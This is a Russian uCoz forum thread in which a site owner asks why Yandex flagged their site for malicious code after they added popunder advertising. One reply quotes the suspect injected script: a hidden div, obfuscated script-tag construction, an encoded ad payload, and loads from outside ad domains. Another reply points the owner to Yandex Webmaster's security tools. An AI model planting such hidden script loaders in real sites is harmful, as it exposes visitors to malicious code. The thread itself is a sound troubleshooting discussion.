Страница 1 из 11
Модератор форума: dotbot 
Сообщество uCoz » Архивариус » Корзина » Сайт вылетел из яндекса (Обнаружен вредоносный код)
Сайт вылетел из яндекса
all4wave
Сообщений: 7
Репутация: 0

Сообщение # 1 | 14:15:17
Такая проблема - на почту пришло следующее сообщение от Яндекса.

"На страницах вашего сайта fil-rulez.ucoz.ru обнаружен код, который может быть опасен для посетителей. Выполнение этого кода при посещении сайта может привести к нежелательным для пользователя последствиям: заражению компьютера вредоносными программами, несанкционированному использованию его ресурсов, порче или краже личных данных."

Вот, собственно, мой сайт - fil-rulez.ucoz.ru
Ставил только рекламу от попандер.ру
Подскажите, пожалуйста, где у меня вредоносный код?

Заранее благодарю ^_^
Сообщение отредактировал all4wave - Четверг, 06 Ноя 2014, 14:16:03
DeadMoras
Сообщений: 172
Репутация: 26

Сообщение # 2 | 14:18:03
all4wave, Возможно не по теме, но все же..Что это за код? И почему он расположен ранее <html>?
Код
<script type="text/javascript">document.write('<div style="width:0px;height:0px;position:fixed;right:0px;top:0px;display:none;overflow:hidden;z-index:10000;" id="dVaJU5GSv"><scr'+'ipt type="text/javascript" src="/abnl/?adsdata=ZKGvOb!3uww!h0C^5rt5Nmwg76;kxC1yO^yeAxGGAS^i;VJ!78Dd2NaRcIf46^90PKT;e^K7ctytkEJVvWXvnuAH1YygSCKM0yVJi7lBcVYwBgmKfQ6wS7v^I1HmLPbSEUGL52vXnQCmeDjwBZU!nSNE9x3D2rfKH8Bwkb6V6AEU9wINRVqQG5bSW6fz3bfRuPOzJkHxgqNlLYgH  FMd7rryJfPtHhTHO9JVJbwki!GrT4T^EvYb;dG3NfyCiSp3xCyLA1rr;1B8UPV8ZiJtvJbvQLqkvxWzhRmgQ5jgrJmtlGavL458QqI0V!5U4HM7bwzMTgtFRKxBmqIGUqxBLTfnnr9ftDVABqiKPzk18^SQeS9uQLEWDRDK3tVvvNbjHegqx!!swVpNA;nMo"></scr'+'ipt></div>');function resizeDiv(islasttry){   var WX,WY,BX,BY;   var o=document.getElementById("dVaJU5GSv"),t,d;   if (!o) return;   if(typeof window.self_getsizes == 'function'){      var s=self_getsizes();      if(s.err==1 && !islasttry) return;      if(isNaN(s.BX)) s.BX==0;      if(isNaN(s.BY)) s.BY==0;      if(s.err==1){         if (!(t=document.getElementById("bannerXaJU5GSv"))) return;         else s.BX=t.value;         if (!(t=document.getElementById("bannerYaJU5GSv"))) return;         else s.BY=t.value;      }      BX=s.BX;      BY=s.BY;   }else{      if (!(t=document.getElementById("bannerXaJU5GSv"))) return;      else BX=t.value;      if (!(t=document.getElementById("bannerYaJU5GSv"))) return;      else BY=t.value;   }   if (!(t=document.getElementById("wrapperXaJU5GSv"))) WX=0;   else WX=t.value;   if (!(t=document.getElementById("wrapperYaJU5GSv"))) WY=0;   else WY=t.value;   d=document.getElementById("mainadsdvaJU5GSv");   if(d){      if (BX<0) d.style.width="100%";      else if (BX>0) d.style.width=BX+"px";      if (BY<0) d.style.height="100%";      else if (BY>0) d.style.height=BY+"px";   }   BX=parseInt(BX)+parseInt(WX);   BY=parseInt(BY)+parseInt(WY);   if (BX<0) o.style.width="100%";   else if (BX>0) o.style.width=BX+"px";   if (BY<0) o.style.height="100%";   else if (BY>0) o.style.height=BY+"px";   o.style.display='';   return true;}function waitForIframe(triesCount){    if(triesCount>10) return;    if(typeof resizeDiv == 'function' && !resizeDiv(triesCount==10 ? 1 : 0)) return setTimeout(function() { waitForIframe(triesCount + 1); }, 500);};document.write('<scr'+'ipt type="text/javascript">waitForIframe(0);</scr'+'ipt>');</script><div><script type="text/javascript">new Image().src = "http://counter.yadro.ru/hit;ucoznet2?r"+escape(document.referrer)+((typeof(screen)=="undefined")?"":";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";"+Math.random();</script></div><script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://spotsniper.ru/?pid=20"></scr'+'ipt>');document.write('<scr'+'ipt type="text/javascript" src="http://rtrgt2.com/apu.php?zoneid=1708" async="defer"></scr'+'ipt>');</script>

Помог?
Не будь жлобом , дай в репу +1.
Сообщение отредактировал DeadMoras - Четверг, 06 Ноя 2014, 14:18:49
Дядька
Сообщений: 105
Репутация: 17

Сообщение # 3 | 14:19:24
all4wave, войдите в личный кабинет http://webmaster.yandex.ru/, нажмете на свой сайт, далее на безопасность-там он вам покажет вредоносный код. но я вам настоятельно удалить код попандера, видимо дело как раз таки в нем
Прикрепления: 4922194.png(18Kb)

Продвижение сайтов
all4wave
Сообщений: 7
Репутация: 0

Сообщение # 4 | 15:06:58
Всем спасибо)
Сообщество uCoz » Архивариус » Корзина » Сайт вылетел из яндекса (Обнаружен вредоносный код)
Страница 1 из 11
Поиск: